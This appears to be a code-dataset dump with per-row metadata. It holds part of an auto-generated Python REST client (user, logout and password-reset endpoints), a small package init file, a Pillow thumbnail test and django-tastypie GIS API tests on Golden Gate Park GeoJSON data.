['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/oauth2Clients', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[OAuth2ClientInfo]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_password_policy_using_get(self, **kwargs): # noqa: E501
"""getUserPasswordPolicy # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_user_password_policy_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UserPasswordPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_password_policy_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_user_password_policy_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_user_password_policy_using_get_with_http_info(self, **kwargs): # noqa: E501
"""getUserPasswordPolicy # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_user_password_policy_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UserPasswordPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/userPasswordPolicy', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserPasswordPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_using_get(self, **kwargs): # noqa: E501
"""getUser # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_user_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: User
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_user_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_user_using_get_with_http_info(self, **kwargs): # noqa: E501
"""getUser # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_user_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: User
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/auth/user', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='User', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def logout_using_post(self, **kwargs): # noqa: E501
"""logout # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.logout_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.logout_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.logout_using_post_with_http_info(**kwargs) # noqa: E501
return data
def logout_using_post_with_http_info(self, **kwargs): # noqa: E501
"""logout # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.logout_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/auth/logout', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def request_reset_password_by_email_using_post(self, reset_password_by_email_request, **kwargs): # noqa: E501
"""requestResetPasswordByEmail # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.request_reset_password_by_email_using_post(reset_password_by_email_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str reset_password_by_email_request: resetPasswordByEmailRequest (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.request_reset_password_by_email_using_post_with_http_info(reset_password_by_email_request, **kwargs) # noqa: E501
else:
(data) = self.request_reset_password_by_email_using_post_with_http_info(reset_password_by_email_request, **kwargs) # noqa: E501
return data
def request_reset_password_by_email_using_post_with_http_info(self, reset_password_by_email_request, **kwargs): # noqa: E501
"""requestResetPasswordByEmail # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.request_reset_password_by_email_using_post_with_http_info(reset_password_by_email_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str reset_password_by_email_request: resetPasswordByEmailRequest (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['reset_password_by_email_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'reset_password_by_email_request' is set
if ('reset_password_by_email_request' not in params or
params['reset_password_by_email_request'] is None):
raise ValueError("Missing the required parameter `reset_password_by_email_request` when calling `request_reset_password_by_email_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'reset_password_by_email_request' in params:
body_params = params['reset_password_by_email_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/resetPasswordByEmail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_password_using_post(self, reset_password_request, **kwargs): # noqa: E501
"""resetPassword # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.reset_password_using_post(reset_password_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str reset_password_request: resetPasswordRequest (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.reset_password_using_post_with_http_info(reset_password_request, **kwargs) # noqa: E501
else:
(data) = self.reset_password_using_post_with_http_info(reset_password_request, **kwargs) # noqa: E501
return data
def reset_password_using_post_with_http_info(self, reset_password_request, **kwargs): # noqa: E501
"""resetPassword # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.reset_password_using_post_with_http_info(reset_password_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str reset_password_request: resetPasswordRequest (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['reset_password_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'reset_password_request' is set
if ('reset_password_request' not in params or
params['reset_password_request'] is None):
raise ValueError("Missing the required parameter `reset_password_request` when calling `reset_password_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'reset_password_request' in params:
body_params = params['reset_password_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/resetPassword', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.447761
| 168
| 0.627967
| 4,110
| 36,064
| 5.181752
| 0.052068
| 0.048458
| 0.026295
| 0.033808
| 0.942621
| 0.932338
| 0.914918
| 0.902146
| 0.883599
| 0.869277
| 0
| 0.015969
| 0.282858
| 36,064
| 937
| 169
| 38.488794
| 0.807486
| 0.324534
| 0
| 0.7921
| 0
| 0
| 0.166556
| 0.070239
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043659
| false
| 0.08316
| 0.008316
| 0
| 0.116424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
526d1e470d906ba1c2261b166020cf9e7d888238
| 74
|
py
|
Python
|
py_pdf_term/tokenizer/__init__.py
|
kumachan-mis/pdf-slides-term
|
cf3319e4de723bd9424d23141803342d3c649103
|
[
"MIT"
] | 1
|
2021-01-08T16:05:30.000Z
|
2021-01-08T16:05:30.000Z
|
py_pdf_term/tokenizer/__init__.py
|
kumachan-mis/py-slides-term
|
1e9337b97ae8968950489e728fc7aeeeb7eb1f4b
|
[
"MIT"
] | 21
|
2021-01-03T13:50:59.000Z
|
2021-06-17T00:27:49.000Z
|
py_pdf_term/tokenizer/__init__.py
|
kumachan-mis/pdf-slides-term
|
cf3319e4de723bd9424d23141803342d3c649103
|
[
"MIT"
] | null | null | null |
from ._tokenizer import * # NoQA
from ._tokenizer import __all__ # NoQA
| 24.666667
| 39
| 0.743243
| 9
| 74
| 5.444444
| 0.555556
| 0.530612
| 0.77551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 74
| 2
| 40
| 37
| 0.816667
| 0.121622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
871dd1f544bfc738fa5ff63fd9a9629602cd9354
| 790
|
py
|
Python
|
Tests/test_image_thumbnail.py
|
radicalgraphics/Pillow
|
9d22c16d539f6e0356d64849b84f2feec6787179
|
[
"Python-2.0"
] | null | null | null |
Tests/test_image_thumbnail.py
|
radicalgraphics/Pillow
|
9d22c16d539f6e0356d64849b84f2feec6787179
|
[
"Python-2.0"
] | null | null | null |
Tests/test_image_thumbnail.py
|
radicalgraphics/Pillow
|
9d22c16d539f6e0356d64849b84f2feec6787179
|
[
"Python-2.0"
] | null | null | null |
from tester import *
from PIL import Image
def test_sanity():
im = lena()
im.thumbnail((100, 100))
assert_image(im, im.mode, (100, 100))
def test_aspect():
im = lena()
im.thumbnail((100, 100))
assert_image(im, im.mode, (100, 100))
im = lena().resize((128, 256))
im.thumbnail((100, 100))
assert_image(im, im.mode, (50, 100))
im = lena().resize((128, 256))
im.thumbnail((50, 100))
assert_image(im, im.mode, (50, 100))
im = lena().resize((256, 128))
im.thumbnail((100, 100))
assert_image(im, im.mode, (100, 50))
im = lena().resize((256, 128))
im.thumbnail((100, 50))
assert_image(im, im.mode, (100, 50))
im = lena().resize((128, 128))
im.thumbnail((100, 100))
assert_image(im, im.mode, (100, 100))
| 21.351351
| 41
| 0.581013
| 119
| 790
| 3.781513
| 0.159664
| 0.106667
| 0.202222
| 0.233333
| 0.851111
| 0.851111
| 0.851111
| 0.851111
| 0.722222
| 0.691111
| 0
| 0.17561
| 0.221519
| 790
| 36
| 42
| 21.944444
| 0.556098
| 0
| 0
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.28
| 1
| 0.08
| false
| 0
| 0.08
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8755386e6d3bf1a2116e7f7856c854ed02ccc1db
| 16,254
|
py
|
Python
|
tests/gis/tests/views.py
|
pavanv/django-tastypie
|
b4ffc642aa56d25d3c577ccae0a03c820b71c4bc
|
[
"BSD-3-Clause"
] | 1,570
|
2015-02-03T10:19:33.000Z
|
2022-03-29T10:34:18.000Z
|
tests/gis/tests/views.py
|
pavanv/django-tastypie
|
b4ffc642aa56d25d3c577ccae0a03c820b71c4bc
|
[
"BSD-3-Clause"
] | 587
|
2015-02-06T13:59:23.000Z
|
2022-03-09T22:56:30.000Z
|
tests/gis/tests/views.py
|
pavanv/django-tastypie
|
b4ffc642aa56d25d3c577ccae0a03c820b71c4bc
|
[
"BSD-3-Clause"
] | 492
|
2015-02-07T06:18:36.000Z
|
2022-03-29T19:06:44.000Z
|
import json
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
from django.http import HttpRequest
from testcases import TestCaseWithFixture
from .utils import skipIfSpatialite
golden_gate_park_query = quote("""{"type": "MultiPolygon", "coordinates": [[[[-122.511067, 37.771276], [-122.510037, 37.766391], [-122.510037, 37.763813], [-122.456822, 37.765848], [-122.452960, 37.766459], [-122.454848, 37.773990], [-122.475362, 37.773040], [-122.511067, 37.771276]]]]}""")
class ViewsTestCase(TestCaseWithFixture):
def test_gets(self):
resp = self.client.get('/api/v1/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 2)
self.assertEqual(deserialized['geonotes'], {'list_endpoint': '/api/v1/geonotes/', 'schema': '/api/v1/geonotes/schema/'})
resp = self.client.get('/api/v1/geonotes/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 2)
self.assertEqual(deserialized['meta']['limit'], 20)
self.assertEqual(len(deserialized['objects']), 3)
self.assertEqual([obj['title'] for obj in deserialized['objects']], [u'Points inside Golden Gate Park note', u'Golden Gate Park', u'Line inside Golden Gate Park'])
resp = self.client.get('/api/v1/geonotes/1/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 12)
self.assertEqual(deserialized['title'], u'Points inside Golden Gate Park note')
resp = self.client.get('/api/v1/geonotes/set/2;1/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 1)
self.assertEqual(len(deserialized['objects']), 2)
self.assertEqual([obj['title'] for obj in deserialized['objects']], [u'Golden Gate Park', u'Points inside Golden Gate Park note'])
def test_posts(self):
request = HttpRequest()
post_data = '{"content": "A new post.", "is_active": true, "title": "New Title", "slug": "new-title", "user": "/api/v1/users/1/"}'
request._body = request._raw_post_data = post_data
resp = self.client.post('/api/v1/geonotes/', data=post_data, content_type='application/json')
self.assertEqual(resp.status_code, 201)
self.assertTrue(resp['location'].endswith('/api/v1/geonotes/4/'))
# make sure posted object exists
resp = self.client.get('/api/v1/geonotes/4/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
obj = json.loads(resp.content.decode('utf-8'))
self.assertEqual(obj['content'], 'A new post.')
self.assertEqual(obj['is_active'], True)
self.assertEqual(obj['user'], '/api/v1/users/1/')
def test_puts(self):
request = HttpRequest()
post_data = '{"content": "Another new post.", "is_active": true, "title": "Another New Title", "slug": "new-title", "user": "/api/v1/users/1/", "lines": null, "points": null, "polys": null}'
request._body = request._raw_post_data = post_data
resp = self.client.put('/api/v1/geonotes/1/', data=post_data, content_type='application/json')
self.assertEqual(resp.status_code, 204)
# make sure posted object exists
resp = self.client.get('/api/v1/geonotes/1/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
obj = json.loads(resp.content.decode('utf-8'))
self.assertEqual(obj['content'], 'Another new post.')
self.assertEqual(obj['is_active'], True)
self.assertEqual(obj['user'], '/api/v1/users/1/')
def test_api_field_error(self):
# When a field error is encountered, we should be presenting the message
# back to the user.
request = HttpRequest()
post_data = '{"content": "More internet memes.", "is_active": true, "title": "IT\'S OVER 9000!", "slug": "its-over", "user": "/api/v1/users/9001/"}'
request._body = request._raw_post_data = post_data
resp = self.client.post('/api/v1/geonotes/', data=post_data, content_type='application/json')
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content.decode('utf-8'), '{"error": "Could not find the provided users object via resource URI \'/api/v1/users/9001/\'."}')
def test_options(self):
resp = self.client.options('/api/v1/geonotes/')
self.assertEqual(resp.status_code, 200)
allows = 'GET,POST,PUT,DELETE,PATCH'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
resp = self.client.options('/api/v1/geonotes/1/')
self.assertEqual(resp.status_code, 200)
allows = 'GET,POST,PUT,DELETE,PATCH'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
resp = self.client.options('/api/v1/geonotes/schema/')
self.assertEqual(resp.status_code, 200)
allows = 'GET'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
resp = self.client.options('/api/v1/geonotes/set/2;1/')
self.assertEqual(resp.status_code, 200)
allows = 'GET'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
class MoreViewsTestCase(TestCaseWithFixture):
def test_get_apis_json(self):
response = self.client.get('/api/v1/', HTTP_ACCEPT='application/json')
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(data, {"geonotes": {"list_endpoint": "/api/v1/geonotes/", "schema": "/api/v1/geonotes/schema/"}, "users": {"list_endpoint": "/api/v1/users/", "schema": "/api/v1/users/schema/"}})
def test_get_apis_xml(self):
response = self.client.get('/api/v1/', HTTP_ACCEPT='application/xml')
data = response.content.decode('utf-8')
self.assertEqual(response.status_code, 200)
self.assertEqual(data, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><geonotes type="hash"><list_endpoint>/api/v1/geonotes/</list_endpoint><schema>/api/v1/geonotes/schema/</schema></geonotes><users type="hash"><list_endpoint>/api/v1/users/</list_endpoint><schema>/api/v1/users/schema/</schema></users></response>')
def test_get_list(self):
response = self.client.get('/api/v1/geonotes/', HTTP_ACCEPT='application/json')
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data['objects']), 3)
# Because floating point.
self.assertEqual(data['objects'][0]['content'], "Wooo two points inside Golden Gate park")
self.assertEqual(data['objects'][0]['points']['type'], 'MultiPoint')
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][0], -122.475233, places=5)
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][1], 37.768616, places=5)
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][0], -122.470416, places=5)
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][1], 37.767381, places=5)
self.assertEqual(data['objects'][1]['content'], "This is a note about Golden Gate Park. It contains Golden Gate Park\'s polygon")
self.assertEqual(data['objects'][1]['polys']['type'], 'MultiPolygon')
self.assertEqual(len(data['objects'][1]['polys']['coordinates']), 1)
self.assertEqual(len(data['objects'][1]['polys']['coordinates'][0]), 1)
self.assertEqual(len(data['objects'][1]['polys']['coordinates'][0][0]), 8)
self.assertEqual(data['objects'][2]['content'], "A path inside Golden Gate Park! Huzzah!")
self.assertEqual(data['objects'][2]['lines']['type'], 'MultiLineString')
self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][0][0], -122.504544, places=5)
self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][0][1], 37.767002, places=5)
self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][1][0], -122.499995, places=5)
self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][1][1], 37.768223, places=5)
def test_post_object(self):
post_data = '{"content": "A new post.", "is_active": true, "title": "New Title", "slug": "new-title", "user": "/api/v1/users/1/"}'
response = self.client.post('/api/v1/geonotes/', data=post_data, HTTP_ACCEPT='application/json', content_type='application/json')
self.assertEqual(response.status_code, 201)
location = response['Location']
self.assertTrue(location.endswith('/api/v1/geonotes/4/'))
# make sure posted object exists
response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
data = response.content.decode('utf-8')
obj = json.loads(data)
self.assertEqual(obj['content'], 'A new post.')
self.assertEqual(obj['is_active'], True)
self.assertEqual(obj['user'], '/api/v1/users/1/')
def test_post_geojson(self):
post_data = """{
"content": "A new post.", "is_active": true, "title": "New Title2",
"slug": "new-title2", "user": "/api/v1/users/1/",
"polys": { "type": "MultiPolygon", "coordinates": [ [ [ [ -122.511067, 37.771276 ], [ -122.510037, 37.766391 ], [ -122.510037, 37.763813 ], [ -122.456822, 37.765848 ], [ -122.452960, 37.766459 ], [ -122.454848, 37.773990 ], [ -122.475362, 37.773040 ], [ -122.511067, 37.771276 ] ] ] ] }
}"""
response = self.client.post('/api/v1/geonotes/', data=post_data, HTTP_ACCEPT='application/json', content_type='application/json')
self.assertEqual(response.status_code, 201)
location = response['Location']
self.assertTrue(location.endswith('/api/v1/geonotes/4/'))
# make sure posted object exists
response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
data = response.content.decode('utf-8')
obj = json.loads(data)
self.assertEqual(obj['content'], 'A new post.')
self.assertEqual(obj['is_active'], True)
self.assertEqual(obj['user'], '/api/v1/users/1/')
self.assertEqual(obj['polys'], {u'type': u'MultiPolygon', u'coordinates': [[[[-122.511067, 37.771276], [-122.510037, 37.766390999999999], [-122.510037, 37.763812999999999], [-122.456822, 37.765847999999998], [-122.45296, 37.766458999999998], [-122.454848, 37.773989999999998], [-122.475362, 37.773040000000002], [-122.511067, 37.771276]]]]})
def test_post_xml(self):
post_data = """<object><created>2010-03-30T20:05:00</created><polys type="null"/><is_active type="boolean">True</is_active><title>Points inside Golden Gate Park note 2</title><lines type="null"/><slug>points-inside-golden-gate-park-note-2</slug><content>A new post.</content><points type="hash"><type>MultiPoint</type><coordinates type="list"><objects><value type="float">-122.475233</value><value type="float">37.768617</value></objects><objects><value type="float">-122.470416</value><value type="float">37.767382</value></objects></coordinates></points><user>/api/v1/users/1/</user></object>"""
response = self.client.post('/api/v1/geonotes/', data=post_data, HTTP_ACCEPT='application/xml', content_type='application/xml')
self.assertEqual(response.status_code, 201)
location = response['Location']
self.assertTrue(location.endswith('/api/v1/geonotes/4/'))
# make sure posted object exists
response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
data = response.content.decode('utf-8')
obj = json.loads(data)
self.assertEqual(obj['content'], 'A new post.')
self.assertEqual(obj['is_active'], True)
self.assertEqual(obj['user'], '/api/v1/users/1/')
# Weeeee! GeoJSON returned!
self.assertEqual(obj['points'], {"coordinates": [[-122.475233, 37.768616999999999], [-122.470416, 37.767381999999998]], "type": "MultiPoint"})
# Or we can ask for XML
response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/xml')
self.assertEqual(response.status_code, 200)
data = response.content.decode('utf-8')
self.assertIn('<points type="hash"><coordinates type="list"><objects><value type="float">-122.475233</value><value type="float">37.768617</value></objects><objects><value type="float">-122.470416</value><value type="float">37.767382</value></objects></coordinates><type>MultiPoint</type></points>', data)
def test_filter_within_on_points(self):
# Get points
response = self.client.get('/api/v1/geonotes/?points__within=%s' % golden_gate_park_query, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content.decode('utf-8'))
# We get back the points inside Golden Gate park!
self.assertEqual(data['objects'][0]['content'], "Wooo two points inside Golden Gate park")
self.assertEqual(data['objects'][0]['points']['type'], 'MultiPoint')
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][0], -122.475233, places=5)
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][1], 37.768616, places=5)
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][0], -122.470416, places=5)
self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][1], 37.767381, places=5)
@skipIfSpatialite
def test_filter_within_on_lines(self):
# Get lines
response = self.client.get('/api/v1/geonotes/?lines__within=%s' % golden_gate_park_query, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content.decode('utf-8'))
# We get back the line inside Golden Gate park!
self.assertEqual(data['objects'][0]['content'], "A path inside Golden Gate Park! Huzzah!")
self.assertEqual(data['objects'][0]['lines']['type'], 'MultiLineString')
self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][0][0], -122.504544, places=5)
self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][0][1], 37.767002, places=5)
self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][1][0], -122.499995, places=5)
self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][1][1], 37.768223, places=5)
@skipIfSpatialite
def test_filter_contains(self):
points_inside_golden_gate_park = """{"coordinates": [[-122.475233, 37.768616999999999], [-122.470416, 37.767381999999998]], "type": "MultiPoint"}"""
# Get polys that contain the points
response = self.client.get('/api/v1/geonotes/?polys__contains=%s' % quote(points_inside_golden_gate_park), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content.decode('utf-8'))
# We get back the golden gate park polygon!
self.assertEqual(data['objects'][0]['content'], "This is a note about Golden Gate Park. It contains Golden Gate Park\'s polygon")
self.assertEqual(data['objects'][0]['polys']['type'], 'MultiPolygon')
self.assertEqual(len(data['objects'][0]['polys']['coordinates']), 1)
self.assertEqual(len(data['objects'][0]['polys']['coordinates'][0]), 1)
self.assertEqual(len(data['objects'][0]['polys']['coordinates'][0][0]), 8)
| 57.843416
| 605
| 0.651901
| 2,077
| 16,254
| 5.031777
| 0.103996
| 0.120563
| 0.041049
| 0.034159
| 0.85255
| 0.805377
| 0.780882
| 0.739738
| 0.71553
| 0.705961
| 0
| 0.080018
| 0.160391
| 16,254
| 280
| 606
| 58.05
| 0.685792
| 0.031192
| 0
| 0.532338
| 0
| 0.079602
| 0.348252
| 0.086586
| 0
| 0
| 0
| 0
| 0.522388
| 1
| 0.069652
| false
| 0
| 0.034826
| 0
| 0.114428
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
